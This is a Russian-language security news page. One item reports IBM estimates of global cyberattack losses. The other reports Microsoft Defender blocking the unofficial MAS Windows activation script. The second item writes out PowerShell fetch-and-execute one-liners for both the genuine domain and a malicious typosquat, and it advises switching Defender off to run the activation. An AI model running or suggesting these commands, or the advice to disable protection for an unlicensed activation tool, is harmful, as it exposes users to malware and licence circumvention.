Хакеры нанесли ущерб во всем мире на $450 млрд

Хакеры нанесли ущерб во всем мире на $450 млрд

Хакеры нанесли ущерб во всем мире на $450 млрд

По расчётам специалистов IBM Security, $450 млрд — столько составят потери бизнеса в 2016 году от кибератак. Для сравнения: запланированные доходы федерального бюджета России в 2016 году должны составить около $210 млрд.

По словам директора по работе с финансовыми организациями IBM Security Антона Менчица, в прошлом году мировой бизнес потерял в результате хакерских атак $400 млрд. В нынешнем году потери будут ещё выше, пишет life.ru.

"Я думаю, что рост сохранится. То есть в прошлом году у всех было $400 млрд — то, что преступники заработали на рынке, — значит, в этом году будет порядка $450 млрд", — заявил он на заседании Российско-китайского финансового совета в преддверии II Восточного экономического форума (ВЭФ-2016). При этом Россия, по оценке председателя правления Сбербанка Станислава Кузнецова, ежегодно теряет от кибератак 600 млрд рублей в год.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru